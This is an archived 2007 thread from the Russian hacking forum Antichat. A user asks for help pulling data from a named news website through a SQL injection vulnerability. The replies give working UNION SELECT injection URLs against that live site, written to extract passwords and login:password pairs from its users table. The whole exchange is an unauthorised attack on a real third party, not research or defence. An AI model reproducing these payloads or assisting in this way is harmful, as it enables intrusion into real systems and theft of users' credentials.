Форум АНТИЧАТ - sql-inj запросы

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - sql-inj запросы (https://forum.antichat.xyz/showthread.php?t=38404)

muse	20.04.2007 13:06

sql-inj запросы

есть сайт с уязвимым параметром page.php?id=35167

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом :(
прав на запросы к msql. нету
прошу помощи у профов

limpompo

20.04.2007 13:17

поищи таблицы user user admin admins members и так далеее

Кароче займись подбором Таблиц и колонок....

muse	20.04.2007 13:25

вы непоняли вопроса.
я немогу вытащить оттуда инфу
например есть таблица users и в ней есть параметр id
но запрос union select 1,id from users ничего не выдает...

guest3297

20.04.2007 13:41

Линк дай.
Млять какой же народ пошел.

muse	20.04.2007 13:50

http://daily.com.ua/analytics/page.php?id=35167

Constantine

20.04.2007 13:51

Помойму иньекция на этот сайт проведена кем то из наших, во всяком случае в антибояне линк есть

guest3297

20.04.2007 14:30

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,2/*

c411k

20.04.2007 16:41

Цитата:

Сообщение от [ cash ]

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*

втф? либо я слепой, либо лыжи не едут, но вывода в упор не вижу.

Цитата:

Сообщение от muse

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом :(

http://daily.com.ua/analytics/page.php?id=3516+and(1=-1)+union+select+concat(login,char(95),password),6+ from+users/*

Время: 22:48